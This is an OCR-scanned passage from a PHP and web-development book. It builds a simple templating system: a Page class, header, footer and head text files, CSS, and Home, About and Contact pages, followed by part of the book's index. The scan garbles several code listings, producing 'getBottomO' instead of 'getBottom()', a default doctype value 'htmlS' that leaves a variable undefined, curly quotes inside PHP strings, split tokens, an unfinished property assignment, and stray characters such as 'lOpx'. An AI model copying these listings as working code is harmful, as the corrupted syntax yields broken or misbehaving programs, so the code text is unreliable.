Enter templates. A template is simply a file that contains standard or boiler¬ 
plate information used to create other files. Templates are a way to reduce 
repeated code. Lor example, you can make a top portion and a bottom portion 
of the page that are common among your pages. You can easily include 
the header and footer on each page, and then if you need to make a global 
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change to one of these areas, you make the change only once and it applies 
to all the common headers or footers. 



Not everything can be part of a template or is a good candidate for being a 
part of a template system. Areas of pages that are common across multiple 
pages, like the header or footer, are good candidates and can be templated 
easily. However, the main content area, which is typically different on every 
page, can’t really be templated. 


Building a PHP Template 

The remainder of the chapter builds a template system using PHP, along 
with the normal HTML, CSS, and JavaScript that go into a page. For this 
chapter, you build a simple HTML page. When you’re done, you will be able 
to create a page that looks like Figure 2-1. 


Figure 2-1: 

Converting 
a page into 
a template 
system. 


I 


■ '0 http://tyfd/b7c: P - S C X || ^ My Web Site X | 


Home About Contact Me 



This is where content would go, should there be any. 


Copyright (c) 2013 Steve Suehring. 


This page has a header section containing a navigational menu with links to 
Home, About, and Contact Me. The page also has a main content area and a 
footer. 

Creating a template class 

The heart of the template system is a PHP class that’s responsible for gather¬ 
ing together the various parts of a given page. The Page class includes a few 
methods and properties. You instantiate the Page class as part of building 
each page. Follow these steps for this exercise: 
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1. Open your text editor and create a new empty file. 

2. Place the following PHP code in the file: 

<?php 

class Page 
{ 

public $tYpe = "default"; 
public $title = "My Web Site"; 
public $titleExtra = 

} //end Page class 

?> 

3. Save the file as classPage .php in your document root. 

Look how the first part of this code breaks down. The class Page is created 
and these three properties are declared: 

♦ Type: This corresponds to the type of page being displayed. By adding 
a type property, you can change the behavior of the various methods 
based on whether the type is default or another type. (This example has 
only a default type.) 

♦ Title: This appears in the browser’s menu bar. 

♦ Extra title: Use this for additional pages, so that the pages can have 
different titles. 

Creating the top of the pa^e 

The top of the page is one of the more complex sections for a template system 
to handle. The top of a web page contains the document type declaration 
(DTD) along with links to the CSS and any JavaScript that will be used on the 
page. The top of the page also contains the title and other meta information 
about the page. 

Aside from the information in the <head> section of a page, the top of the 
page that you’re using in this chapter as an example also contains the menu 
in Figure 2-1, with the links to other pages on the site. 

The class that you will create in the initial exercise for this chapter has four 
methods for the top of the page, including both the <head> section and the 
menu. However, when using the class, you don’t want to have to call (or 
remember to call) all the various methods in the correct order to create the 
top section of the page. All you care about is that you create a top section 
of the page. Therefore, there’s only one public method, called getTop. The 
getTop method is responsible for gathering all the bits to make the entire 
top of the page. 
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1 . Open classPage.php if it isn’t aiready open. 

2 . Within classPage, just beiow the public $titleExtra = "'';line, 
enter the following code: 

public function getTop() { 

$output = ""; 

$output .= $this->_getDocTYpe(); 

$output .= $this->_getHtmlOpen(); 

$output .= $this->_getHead(); 

$output .= file_get_contents("pageTop.txt"); 
return $output; 

} //end function getTop() 

3. Save classPage.php. 

The getTop () method creates a variable for the output. This gives flex¬ 
ibility to add to or remove from the variable as you need to. The method 
calls three additional methods, grabs some plain HTML from a file called 
pageTop. txt, and returns the output. 

4. Within classPage .php (open it if it isn’t already), below the 
getTop () method’s closing brace, enter the foliowing code: 

protected function _getDocTYpe($doctYpe = "html5") { 
if ($doctYpe == "html5") { 

$dtd = "<!DOCTYPE html>''; 

} 

return $dtd . "\n"; 

} 

protected function _getHtmlOpen($lang = "en-us") { 
if ($lang == "en-us") { 

$htmlopen = "<htinl lang=\"en\ ">" ; 

} 

return $htmlopen . "\n"; 

} 

protected function _getHead() { 

$output = ""; 

$output .= file_get_contents("pageHead.txt"); 
if ($this->titleExtra != "") { 

$title = $this->titleExtra . "|" . $this- 
>title; 

} else { 

$title = $this->title; 

} 

$output .= "<title>" . $title . "</title>"; 

$output .= "</head>"; 
return $output; 

} //end function _getHead() 
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The three methods that you add in Step 4 are responsible for building the 
<head> section of the page. The first method, _getDocTYpe, returns the 
DTD, which for your case will be HTML5, but could be any other valid docu¬ 
ment type. 

DTDs tell the browser what type of document to expect and what rules that 
document will honor. This helps the browser to make decisions about how 
to display the document. 

The next method called is _getHtmlOpen (), which creates the <html> 
element of the page and sets the language. Like other methods, the language 
can be customized here if need be. 

The final method called is the _getHead () method. This method incorporates 
another file, called pageHead. txt. The pageHead. txt file includes links 
to CSS and JavaScript. Remember that $tYpe property that’s set in the Page 
class? Here’s one place where you might use it. If you have a special page 
type that requires additional CSS or JavaScript, you could add a conditional 
statement here like, “If type is special, then use pageSpecialHead. txt.” 

The _getHead () method is also where the title of the page is set; if the 
$titleExtra property is set, then it gets used here too. 

Now you have the capability to build the top of the page, or close to it, 
anyway, because you still need the code for those two text files, pageHead. 
txt and pageTop. txt. You create those using the following steps. 

1 . Create a new empty file in your text editor. 

2. Inside of the file, enter the following markup: 

<head> 

<link rel="stylesheet" href="style.css" type="text/css" 
/> 

3. Save the file as pageHead. txt in your document root and resist the 
temptation to close that <head> element! 

The <head> element is opened in this file (though it could also be opened 
Inside of the _getHead () method). However, because you need to add 
other elements, like the title, to the <head> section, don’t close the <head> 
element in this file. Instead, leave that for the _getHead () method to do. 
This gives you the greatest flexibility for changes and additions later. 
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1 . Create a new empty file in your text editor. 

2. Inside of the file, add the following markup: 

<bodY> 

<div id="menu"> 

<ul> 

<li><a href="home.php">Home</a></li> 

<li><a href="about.php">About</a></li> 

<li><a href="contact.php">Contact Me</a></li> 

</ul> 

</div> <!-- end menu --> 

3. Save the file as pageTop . txt in your document root. 

Creating the bottom of the pa^e 

With the top of the page created in template form, create the bottom by fol¬ 
lowing these steps. 

1 . Open classPage.php if it isn’t already opened. 

2. Within classPage .php, place the following code, helow the closing 
brace for the _getHead () method: 

public function getBottomO { 

return file_get_contents("pageBottom.txt"); 

} //end function getBottomO 

3. Save the file. 

This code simply retrieves the contents of a file called pageBottom. txt. 
Now’s as good a time as any to build that file. Follow these steps: 

1 . Create a new empty file within your text editor. 

2. Within the file, place the following HTML: 

<div id="footer"> 

Copyright (c) 2013 Steve Suehring. 

</div> <!-- end footer --> 

</body> 

</html> 

3. Save the file as pageBottom.txt in your document root. 

Connecting the top, bottom, and middle 

The final classPage .php file should look like Listing 2-1. 
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Listing 2-1: The Final classPage.php File 

<?php 

class Page 
{ 


public $tYPe = "default"; 
public $title = "My Web Site"; 
public $titleExtra = ""; 

public function getTop() { 

$output = ""; 

$output .= $this->_getDocTYpe(); 

$output .= $this->_getHtmlOpen(); 

$output .= $this->_getHead(); 

$output .= file_get_contents("pageTop.txt"); 
return $output; 

} //end function getTop() 

protected function _getDocTYpe($doctYpe = "htmlS") { 
if ($doctYpe == "html5") { 

$dtd = "<!DOCTYPE html>"; 

} 

return $dtd . "\n"; 

} 

protected function _getHtinlOpen($lang = "en-us") { 
if ($lang == "en-us") { 

$htmlopen = "<html lang=\"en\">"; 

} 

return $htmlopen . "\n"; 

} 

protected function _getHead() { 

$output = ""; 

$output .= file_get_contents("pageHead.txt"); 
if ($this->titleExtra != "") { 

$title = $this->titleExtra . "|" . $this->title; 
} else { 

$title = $this->title; 

} 

$output .= "<title>" . $title . "</title>"; 

$output .= "</head>"; 
return $output; 

} //end function _getHead() 

public function getBottom() { 

return file_get_contents("pageBottom. txt"); 

} //end function getBottomO 

} //end class Page 
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You’re ready to create a page with your new templating system. Follow these 
steps: 

1 . Create a new empty file in your text editor. 

2. Inside of the file, enter the following code and HTML: 

<?php 

require_once("classPage.php"); 

$page = new Page(); 
print $page->getTop(); 
print <<<EOF 
<div id="mainContent"> 

<p>This is where content would go, should there be 
any.</p> 

</div> <!-- end main content --> 

EOF; 

print $page->getBottom(); 


?> 

3. Save the file as home. php in your document root. 

This file instantiates a new instance of the Page class and then calls the 
getTop () method. With that done, the page being built will have everything 
it needs right up to the main content area. The main content area is pro¬ 
vided in this file and is denoted with the print «<eof heredoc statement. 
This type of statement tells PHP to just simply output whatever follows right 
up until it sees the closing EOF, which appears on its own line, left-justified. 

Finally, the getBottom () method is called to round out the page. 

It’s time to view the page. Open your web browser and point to http: / / 
localhost/home. php. When viewed in a web browser, the page looks like 
that in Figure 2-2. 
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Figure 2-2: 

The page, 
being 

served from 
a templating 
system. 



http://tt/Wb7c] ^ ^ 



exile My Web Site X 


• Home 

• About 

• Contact Me 


This is where content would go, should there be tiny. 


CopjTight (c) 2013 Steve Suehring. 


You may notice that the page shown in Figure 2-2 doesn’t look like that in 
Figure 2-1. You can tidy that up with a bit of CSS. Here are the steps: 

1 . Create a new empty text file in your editor. 

2. Place the following CSS in the file: 

#menu { 

height: 20%; 

border: 2px solid black; 

} 

#menu ul { 

text-align: center; 

} 

#menu ul li { 

display: inline; 
list-style-type: none; 
padding-right: lOpx; 

} 

body { 

font-family: arial, helvetica; 


#footer { 

text-align: center; 
margin-top: 150px; 
padding: 20px; 
height: 15%; 

border: Ipx solid black; 


Book VII 
Chapter 2 


Building a 
Templating 
System 



















650 Extending the Template 


3 . Save the file as style. css in your document root. 

4. Reload the home .php page in your browser. 

The page now looks like that in Figure 2-1. 


EKtendinq the Template 

With the first page built, you can turn your attention to another page for the 
site. The page you built links to two other pages, About and Contact Me, so 
now it’s time to build those two. 

Building an About pa^e 

Building an About page is a simple matter of creating a new file, instantiating 
the Page class, and adding content. Follow these steps: 

1 . Create a new empty file in your editor. 

2 . In the file, place the following code: 

<?php 

require_once("classPage.php"); 

$page = new Page(); 

$page->titleExtra = "About"; 
print $page->getTop(); 
print <<<EOF 
<div id="mainContent"> 

<p>lt's all about me.</p> 

</div> <!-- end main content --> 

EOF; 

print $page->getBottom(); 

?> 

3 . Save the file as about .php in your document root. 

4. View the page in your browser by going to http : / /localhost/ 
about.php. 

The page should look like Figure 2-3. Notice the new title bar, as com¬ 
pared to Figure 2-2. 
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Figure 2-3: 

Creating a 
new page 
with the 
templating 
system. 




.. JIIS http;//tt/fd/bTc: p - a C X 

1 ^ About|My Web Site X | 






Home About 

Contact Me 


It's all about me. 



Copyright (c) 2013 Steve Suehrlng. 


Looking at the code that you created in this exercise, notice that it’s similar 
to the code for the home page. The only changes are to set the titleEx- 
tra property and to change the actual HTML content of the page. That’s 
the beauty of templating systems: You can now create many, many pages, 
quickly and easily. If you need to change something or add a new menu 
item, you can do so in one location and it will automatically and instantly be 
updated across all the pages. 

BuiUin^ a Contact pa^e 

Contact pages for websites sometimes include other elements, maybe a form 
or another way to interact. This means you might need to include another 
JavaScript file or different CSS. Luckily, you can do so by extending the tem¬ 
plating class and using that type property discussed throughout this chap¬ 
ter. Follow these steps to create the Contact page: 

1 . Open classPage.php. 

2. Inside of the _getHead () method, add a conditional for a new type of 
page. 

The entire _getHead method should look like this: 

protected function _getHead() { 

$output = "”; 

if ($this->tYpe == "contact”) { 

$output .= file_get_contents("pageHeadContact. 
txt"); 

} else { 

$output .= file_get_contents("pageHead.txt"); 

} 

if ($this->titleExtra != "") { 
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$title = $this->titleExtra . "|" . $this- 
>title; 

} else { 

$title = $this->title; 

} 

$output .= "<title>" . $title . "</title>"; 

$output .= "</head>"; 
return $output; 

} //end function _getHead() 

This code checks to see if the type property ($this->tYpe) is set to 
contact. If it is, then a new <head> section file is included. Otherwise, 
the normal <head> section is included. 

3. Save classPage.php. 

h. Create a new empty file in your text editor. 

5. Inside of the file, add the following markup: 

<head> 

<link rel="stylesheet” href="style.css" type="text/css' 
/> 

<link rel="stylesheet” href=”contact.css” type=”text/ 
css” /> 

<script tYpe=”text/javascript” src=”https://ajax. 

googleapis.com/ajax/libs/jquery/1.8.3/jquery.min. 
js''></script> 

6. Save the file as pageHeadContact. txt in your document root. 

7. Create a new empty file in your text editor. 

8. Inside of the file, place the following CSS: 

.contactMethod { 

font-style: italic; 
font-weight: bold; 

} 

9. Save the file as contact. css in your document root. 

10. Create a new empty file in your editor. 

11. Within the file, place the following code and HTML: 

<?php 

require_once("classPage.php”); 

$page = new Page(); 

$page->type = "contact"; 

$page->titleExtra = "Contact Me”; 


print $page->getTop(); 






Extending the Template 


print <<<EOF 

<div id="mainContent"> 

<hl>Contacting me is easY</hl> 

<p class="contactMethod">suehring@braingia.com</p> 

<p class="contactMethod">Twitter: @stevesuehring</p> 

</div> <!-- end main content --> 

EOF; 

print $page->getBottom(); 


?> 

12. Save the file as contact. php in your document root. 

13. View the file in your browser 

It should look like Figure 2-4. 


Figure 2-4: 

The Contact 
page built 
using a 
template. 



http;//tt/fd/b7c] 



Contact Me|My Web ... x| L 


Home About Contact Me 

Contacting me is easy 

suehring@braingia.com 
Twiner: @stevesuehring 



Copyright (c) 2013 Steve Suehrlng 
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1 h. Click through each link: Home, About, and Contact Me. 

The pages should work and link to each other. 
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Symbols 

- (minus sign), 197, 290 

- special character, 324 

! (exclamation point), 332-333 
!=, <> comparison operator, 321 
!== comparison operator, 321 

# (pound sign), 131, 173 

$ (dollar sign), 282, 283, 324, 405 
$0 construct, 225, 227 
$_SESSlON arrays, 438 
$ fh variable, 384 
$result variable, 519 
$ (this) selector, 231 
$this variable, accessing properties 
with, 404-405 
% (modulus) sign, 290 
&# 160 ; entity, 100-101 
&nbsp; entity, 100-101 
() special character, 324 
(II) special character, 324 

* (asterisk), 197, 290, 324 
. (periods), 132, 294, 324 

• htaccess file, setting PHP options 

in,636 

/ (forward slash), 197, 290, 327 
: hover pseudoclass, 251 
? special character, 324 
@ symbol, 301, 315 
[ ] (square brackets), 296, 324 
\ (backslash), 292, 324, 327 
\n PHP character, 280-281, 293 
\ t PHP character, 293 
^ special character, 324 

_(two underscores), 407 

{,} special character, 324 
{} (curly braces), 208, 276-277, 278, 
284, 285 

+ (plus sign), 196, 289, 290, 324 
< comparison operator, 321 
<= comparison operator, 321 
= (equal sign), 194, 282 


== (equal operator), 421-422 
== comparison operator, 321 
=== (identical operator), 421-422 
=== comparison operator, 321 
> comparison operator, 321 
>= comparison operator, 321 
’ (single quote), 292 
“ “ (double quotes), 285 
‘ ‘ (single quotes), 285 

A 


a date format symbol, 309 
A date format symbol, 309 
a mode, 384 
a+ mode, 384 

<a> tag, 94, 108-109, 111-112 
About page, building, 650-651 
absolute versus relative links. 111 
abstract classes, 415-417 
abstract methods, 415-418 
access denied error message, 69 
access to databases, controlling, 
459-462 

accessing text files, with PHP, 
384-386 

accounts, MySQL 
adding, 465 

administrator responsibilities 
regarding, 458 
attributes of, 459 
names of, 460-461 
overview, 455, 462, 464 
passwords, 461, 465-466 
privileges, 461-462, 466-467 
removing, 467-468 
viewing information about, 464 
action attribute, 172-173 
add_numbers function, 350-351 
addBorder class, 143 
addClass () function, 239 
addNumbers function, 205-207 
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AddType statements, 47-48, 49 
administration of MySQL 
accounts, setting up, 462, 464-468 
administrator responsibilities, 
457-458 

backing up databases, 468-471 
controlling access to data, 
459-462 

default root account, 458 
overview, 457 
restoring data, 471-473 
upgrading MySQL, 473 
alert {) function, 204, 262 
alerts, 191-193, 262 
aligning web form fields with CSS, 
180-183 

ALL privilege, 462 
all-in-one installation kits 
for Apache, 24 
for MySQL, 59 
for PHP, 38-39 
XAMPP installation kit 
Control Panel, using, 78-79 
installing, 76-78 
obtaining, 75-76 
overview, 24, 38, 59, 75 
reinstalling, 84-85 
testing, 79-82 
troubleshooting, 85 
uninstalling, 84-85 
alt attribute, 114 
ALTER privilege, 462 
ALTER Statement, 494-495, 514 
Amazon, 541 

anchor tag, 94, 108-109, 111-112 
and, in comparisons, 327-329 
anonymous function, 225 
antivirus utilities, 434 
Apache 

advantages of, 14 
checking version of, 42 
configuring, 32-33, 83-84 
configuring for PHP, 47-48, 49 
getting information on, 31 
installing on local computers, 
19-20 


installing PHP on Linux or 
Unix with, 41 
obtaining, 22-24 
overview, 8, 21, 273 
PHP compatability with, 273 
running as service, 85 
securing, 426-427 
starting and stopping, 28-30 
testing web servers, 21-22 
verifying downloaded files, 24-25 
version of, checking, 41 
XAMPP Control Panel, starting and 
stopping with, 78-79 
Apache option, configure command, 
43 

Apache VirtualHost container, 636 
Apache website, obtaining Apache 
from, 23 

apachectl script, 29 
append () function, 228-229 
apxs utility, 40, 42, 43, 44 
arguments, adding to functions, 204 
arithmetic operations on numeric data 
types, 289 

arithmetic operators, 290-291 
arraY_key_exists {) function, 538 
arrays 

$_SESSION, 438 
creating, 296-297 
getting values from, 301-302 
holding multiple values in, 195 
for loops, 202-203 
multidimensional, 305-306 
overview, 288, 296 
reading files into, 388-389 
removing values from, 299 
sorting, 299-301 
viewing, 298-299 

walking through values in, 302-305 
arsort function, 301 
ASCII code, 321, 380 
asort function, 300, 301 
assigning 

strings to variables, 292 
timestamps to PHP variables, 

309-310 

values to PHP variables, 282-283 
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asterisk (*), 197, 290, 324 
attacks, handling, 429-432, 433 
attr () function, 233, 234, 236, 238 
attributes 
action, 172-173 
alt, 114 

database, 478-479 
href, 108 
HTML, 108 
id, 177, 182 
maxsize, 173 
method, 172 
name, 112, 177, 178 
in OOP, 399 
selected, 175, 176 
setting, 232-237 
size, 173 
src, 113, 190, 234 
target, 112 
value, 173-174 

authenticate function, 610, 611 
authenticated pages, adding, 
612-618 

AUTO_INCREMENT field, 524 
auto_prepend_f ile function, 
531-532 

B 


background colors, changing, 
147-150 

background images, 113, 150-154 
background-color CSS 
property, 147 

background-image CSS property, 
150-154 

background-position CSS 
property, 153 
backing up 

databases, 458, 468-471 
by web-hosting companies, 17 
backslash (\), 292, 327 
backticks, 372, 373-374 
ball objects, creating, 208 


basename function, 367 
basic selectors, jQuery, 226 
beginning statements, in for 
loops, 337 

BIGINT data type, 483 
binary files, 23, 37, 58, 380 
bindir=DIR option, PHP, 45 
blank account names, 460 
blank fields, checking for on web 
forms, 246-247 
blank hostnames, 461 
blank web pages, troubleshooting, 53 
block-level elements, 98, 160 
blocks, 276-278 

body section, HTML documents, 94 
<bodY> element, 130 
Boolean data type, 288, 295-296 
borderClass class, 238-239 
borders 

adding to HTML tables, 107-108 
CSS, 140-144 

bottom of page, in templates, 646 
<br> tag, 94, 99-100 
break statements, 334, 335, 344-346 
breaking out of loops, 344-346 
browser cookies 
checking if enabled, 438-440 
overview, 438 

browser detection, 214-216 
browsers 
defined, 7 

detecting with JavaScript, 214-216 
fonts, choosing web-friendly, 
138-140 

general discussion, 8 
JavaScript support, 188, 220 
on mobile devices, 10 
redirecting to other pages, 216-217 
testing CSS across multiple, 

122-123 

brute force attack, 461 

built-in PHP functions, 356, 637-638 

bullet styles, 145-146 
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C syntcix, 277 
calling functions, 204-205 
Can’t connect to .. . error message, 70 
Cascading Style Sheets (CSS) 
advantages of, 122 
background colors, changing, 
147-150 

background images, adding, 150-154 

borders, 140-144 

classes, 131-134 

comments, 132 

external style sheets, 128-129 

font color, setting, 138-140 

font family, setting, 134-136 

font size, setting, 136-138 

footers, 163-167 

on forms, reviewing, 561-562 

general discussion, 11, 121-122 

headers, 163-167 

hiding elements, 161 

inline, 122-126 

internal style sheets, 126-128 
jQuery, changing with, 237-240 
limitations of, 122-123 
list styles, 144-147 
matching cases with HTML, 131 
overview, 121 

for registration pages, 597-598 
single-column layout, creating, 
155-158 
targeting styles 
background colors, changing, 
147-150 

groups of elements, 131-134 
individual elements, 130-131 
overview, 128-129 
selecting HTML elements, 130 
two-column layout, creating, 

159-162 

web form fields, aligning with, 
180-183 


case sensitivity 
with JavaScript, 194 
jQuery, 226 

matching CSS with HTML, 131 
PHP statements, 276 
PHP variables, 282 
SQL, 451-452 
cast, 288 
catch block, 420 
CDN-hosted jQuery, 220, 222-223 
CGI (Common Gateway interface), 427 
chaining, 230 

changelmage () function, 237 
CHAR data type, 483 
character data, storing, 481-482 
character encoding, 119 
character input in text boxes 
counting characters in, 254-257 
preventing, 257-259 
character strings 
assigning to variables, 292 
double-quoted, 292-294 
joining, 294 
overview, 288, 292 
single-quoted, 292-294 
SQL queries, 452 
storing long, 295 

checkboxes, 170, 176-177, 579-580 
child classes, 400, 415-417 
circle list style, 144 
class methods, building, 628-632 
class statements, 402, 403 
class_exists function, 422 
classes 

$this variable, accessing properties 
with, 404-405 
abstract, 415-417 
benefits of, 534-535 
class statements, writing, 403 
constructor, writing, 409-410 
CSS,131-134 
disabling, 637-638 
getting information about, 422-423 
methods, adding, 405-407 
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overview, 398-399, 402 
preventing changes to, 418 
private properties and methods, 
407-409 

properties, setting, 403-404 
public properties and methods, 
407-409 

simplifying, 410-413 
template, creating, 642-643 
User, building, 607-610 
using in scripts, 413-415 
clear CSS property, 157 
clearing web forms, 180 
CLl (command line interface), 453 
click event handlers, 247-251 
click () function, 250 
client does not support 
authentication protocol 
error message, 69-70 
client software, 453 
client-server model, 7 
client-side validation, 555, 556 

_clone method, 420-421 

closing tags, 91 
closing text files, 386 
color 

of background, changing, 147-150 
of font, setting with CSS, 138-140 
hex codes for, 137-138 
columns_priv table, 463 
comma-delimited files 
adding data to databases, 500 
creating, 391 
overview, 389-391 
reading, 391 

command line interface (CLl), 453 
comma-separated values (CSV) files 
converting to TSV files, 392-393 
creating, 391 
overview, 389-391 
reading, 391 


comments 
CSS, 132 
HTML, 101-102 
JavaScript, 193, 262-264 
PHP, 316-318 

commercial licenses for MySQL, 58 
Common Gateway Interface (CGI), 427 
Community Server, 57 
company websites, web hosting for, 
15-16 

comparing objects, 421-422 
comparison operators, 320-322 
complex statements, 276-277, 319 
computers, setting up for web 
development 
MySQL, installing, 20 
overview, 19 
PHP, installing, 20 
web servers, installing, 19-20 
concatenation, 196, 294 
conditional blocks, 276-277 
conditional statements 
in for loops, 338 
if statements, 330-333 
overview, 319, 329-330 
switch statements, 329, 333-335 
conditionals, 197-200 
conditions, setting up 
comparing values, 320-322 
joining multiple comparisons, 
327-329 
overview, 320 

pattern matching with regular 
expressions, 323-327 
testing variable content, 322 
confidentiality of websites, 587 
configuration files 
Apache, 83-84 
editing, 82 
MySQL, 65, 84 
PHP, 83 

configure command, 27-28, 41, 
43-44 
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configuring Apache, 32-33 
configuring php. ini files 
disabling functions and classes, 
637-638 

error display, changing, 639 
making changes outside of, 636 
overview, 635 

resource limits, changing, 639 
session parameters, changing, 637 
session timeout, changing, 636-637 
working with, 635 

connecting to MySQL server, 517-519 
connection verification, 459 
Console Panel, Firebug add-on, 267 
console.log, 268 
constants, 287-288 

_construct method, 410 

constructor, writing, 409-410 
Contacts page, building, 651-653 
continue statements, 344-346 
Control Panel, XAMPP, 78-79, 85 
converting HTML special characters to 
entities, 432 

convertstate function, 538, 539 
cookies 

checking if enabled, 438-440 
overview, 438 

session parameters, changing, 637 
copy statement, 368 
copying 

files with PHP functions, 368-369 
objects, 420-421 
corrupt tables, replacing from 
backups, 471 

counting characters in text boxes, 
254-257 

CREATE DATABASE Statement, 

489-490 

CREATE privilege, 462 

CREATE TABLE Statement, 491-493 

CREATE USER Statement, 465 

Creative Commons, 150 

cross site scripting, 430 

crypt {) function, 610 


CSS (Cascading Style Sheets) 
advantages of, 122 
background colors, changing, 
147-150 

background images, adding, 150-154 

borders, 140-144 

classes, 131-134 

comments, 132 

external style sheets, 128-129 

font color, setting, 138-140 

font family, setting, 134-136 

font size, setting, 136-138 

footers, 163-167 

on forms, reviewing, 561-562 

general discussion, 11, 121-122 

headers, 163-167 

hiding elements, 161 

inline, 122-126 

internal style sheets, 126-128 
jQuery, changing with, 237-240 
limitations of, 122-123 
list styles, 144-147 
matching cases with HTML, 131 
overview, 121 

for registration pages, 597-598 
single-column layout, creating, 
155-158 
targeting styles 
background colors, changing, 
147-150 

groups of elements, 131-134 
individual elements, 130-131 
overview, 128-129 
selecting HTML elements, 130 
two-column layout, creating, 

159-162 

web form fields, aligning with, 
180-183 

CSS classes, 131-134 
CSV (comma-separated values) files 
converting to TSV files, 392-393 
creating, 391 
overview, 389-391 
reading, 391 
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curly braces ({}), 208, 276-277, 278, 
284, 285 

current Statement, 303 
currentVal variable, 256 

D 


d date format symbol, 308 
D date format symbol, 309 
dashed border style, 141 
data 

adding to databases, 498-502 
choosing for databases, 475-477 
transfer fees, by web-hosting 
companies, 17 
data types 
BIGINT, 483 
Boolean, 288, 295-296 
CHAR, 483 

character strings, 292-295 
DATE, 483 
DATETIME, 484 
DECIMAL, 483 
ENUM, 484 

floating-point numbers, 289-291 
INT, 483 

integer, 288, 289-291 
integers, 289-291 
MySQL, 481-484 
NULL, 288, 296 
numeric, 289-291 
object, 288 
overview, 288-289 
querying PHP, 289 
resource, 288 
SERIAL, 484 
TEXT, 483 
TIME, 483 
VARCHAR, 483 
database design 
choosing data for, 475-477 
documentation, 487-488 
organizing data, 477-480 
overview, 475 


relationships between tables, 
creating, 480-481 
sample, 484-487 
storing different types of data, 
481-484 
databases 

browsing data in, 502 
building, 489-493 
choosing data for, 475-477 
controlling access to, 459-462 
data, adding, 498-502 
organizing data, 477-480 
overview, 475, 497 
relationships between tables, 
creating, 480-481 
removing data from, 513-514 
retrieving data from, 502 
combining data from separate 
tables, 508-513 
overview, 502-503 
specific information, 503-504 
in specific orders, 505 
from specific rows, 505-508 
sample, 484-487 
storing different types of data, 
481-484 

structure of, 450, 494-495 
updating data in, 513 
user, for login applications, 589-591 
web services, returning data with, 
545-548 

writing designs, 487-488 
date data, storing, 482 
DATE data type, 483 
date format symbols, 308-309 
date () function, 308, 545 
dates, 220, 307-310, 542-545 
DATETIME data type, 484 
db table, 463 

debugging with Firebug add-on, 
266-268 

DECIMAL data type, 483 
decimal list style, 144 
default filenames, 18 
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default root account, 458 
default time zones, setting, 307-308 
default values for drop-down boxes, 
175-176 

define statement, 287 
DELETE privilege, 462 
DELETE statement, 513 
deleting 

data in databases, 513-514 
databases, 490 

files with PHP functions, 368-369 
delimiters, 327 

Denial of Service (DoS) attacks, 433 
deprecated functions, 313 
designing databases 
choosing data for, 475-477 
documentation, 487-488 
organizing data, 477-480 
overview, 475 

relationships between tables, 
creating, 480-481 
sample, 484-487 
storing different types of data, 
481-484 

destroying objects, 423-424 

_destruct method, 423-424 

detecting web browsers, 214-216 
Developer’s Tools CD, 43 
development environment 
configuring, 82-84 
testing, 79-82 
die statement, 385 
directives, 32, 84 
directories 

copying file into different, 368 

creating with PHP, 369-370 

include, 363 

listing files in, 370-372 

overview, 366 

PHP scripts, 81 

root, 366 

directory handles, 370 
directory listings, FTP, 380 
dirname function, 367 
disable-libxml option, PHP, 45 


disabling 

form fields, 257-259 
functions and classes, 637-638 
disc list style, 144 
diskspace, provided by web-hosting 
companies, 17 

display code, separating from logic 
code, 357-358 
display CSS property, 160 
display_errors directive, 639 
display_errors option, 428 
displaying PHP content on web pages, 
278-281 

displaying values in PHP variables 
with echo statements, 284-285 
knowing how long variables hold 
values, 286 
overview, 284 

with print statements, 284-285 
with print_r statements, 286 
with var_dump statements, 286-287 
DISTINCT keyword, 505, 508 
div CSS selector, 130 
<div> tag, 95, 96, 126, 127-128 
division, 197 
division (/) sign, 290 
.dll files, 74 

DMG files, installing MySQL on Macs 
from, 62-63 

DNS (Domain Name System), 9, 14 
doctypes, 90-91 
document object, 211, 214 
Document Object Model (DOM), 210, 
211-214 
Document Root 
changing location of, 32, 33 
location of, 51 

Document Type Declaration (DTD), 
90-91 

documents, HTML 
block-level elements, 98 
body section, 94 
comments, 101-102 
head section, 92-93 
images, adding, 113-116 
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indentation in, 102 
inline elements, 98 
inserting text, 95-96 
line breaks, inserting, 99-101 
links, adding, 108-112 
lists, adding, 102-105 
overview, 89-90, 91-92 
root element, 92 
spaces, inserting, 99-101 
tables, 102-103, 105-108 
title elements, 93 
types of, declaring, 90-91 
dollar amounts, formatting numbers 
as, 291 

dollar sign ($), 282, 283, 405 
DOM (Document Object Model), 210, 
211-214 

Domain Name System (DNS), 9, 14 
domain names, 9 
DOMDocument object, 551 
DoS (Denial of Service) attacks, 433 
dot (.), 294 
dot notation, 208, 209 
dotted border style, 141 
double border style, 141 
double quotes (“ “), 285 
double-quoted strings, 292-294 
do . .while loops, 335, 341-342 
downloaded files, verifying, 24-25, 
39, 59 

downloading 
Apache, from website, 23 
Firebug add-on, 265 
with FTP, 380-382 
jQuery, 220-221 
MySQL, 58 

PHP, from website, 37 
XAMPP installation kit, 75-76 
DROP privilege, 462, 490 
DROP TABLE Statement, 493 
DROP USER Statement, 468 
drop-down boxes, 170, 174-176, 431, 
579-580 

DTD (Document Type Declaration), 
90-91 


dynamic web applications 
MySQL, 12-13 
PHP, 12-13 

E 


E_ERROR keyword, 312 
each () loop, 230 

echo statements, 275-276, 278-281, 
284-285, 287, 298 
ECMA-262 specification, 188 
e-commerce administration, 587 
editors, text, 89, 97, 311 
else section of if statements, 330 
elseif section of if statements, 330 
e-mail addresses 
PHP validation of, 581-582 
provided by web-hosting 
companies, 17 
e-mail functionality 
class methods, building, 628-632 
overview, 618-619 
password recovery page, building, 
619-622 

password reset database, 
building, 619 

password reset page, building, 
623-625 

process files, building, 625-628 
success page, building, 622-623, 625 
email Pass method, 628-630 
em’s, font sizing by, 136-138 
enable-ftp option, PHP, 45 
enable-magic-quotes option, 

PHP, 45 
enabling 
FTP, 378 

panels in Firebug add-on, 267 
encoding, character, 119 
encryption of MySQL passwords, 461 
end statement, 303 
ending statements, in for loops, 338 
endingcondition Statement, 336 
ENDSTRING, 295 
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Enterprise Server, 58 
entities, database, 478 
ENUM data type, 484 
enumeration data, storing, 482-483 
equal operator (==), 421-422 
equal sign (=), 194, 282 
error display, changing PHP, 639 
error log, MySQL, 70 
error messages 
access denied, 69 
Can’t connect to .. ., 70 
client does not support 

authentication protocol, 69-70 
MySQL, 522-523 
SQLite software, 395 
undefined function, 53, 73 
web services, 547 
error messages, PHP, 301 
displaying, 313-315 
fatal errors, 312 
logging, 315-316 
notices, 313 

operating system commands, 
accessing with, 376-377 
overview, 310 
parse errors, 311 
strict messages, 313 
suppressing, 315 
types of, 310-311 
warnings, 312 
error_log option, 428 
error_reporting directive, 639 
errors, handling with Exception 
class, 419-420 
escaping from HTML, 272 
escaping special characters, 292, 
525-526 
events 

form, 242-247 

hover event handler, adding, 
251-254 

keyboard,254-259 
mouse click event handler, adding, 
247-251 
overview, 241 
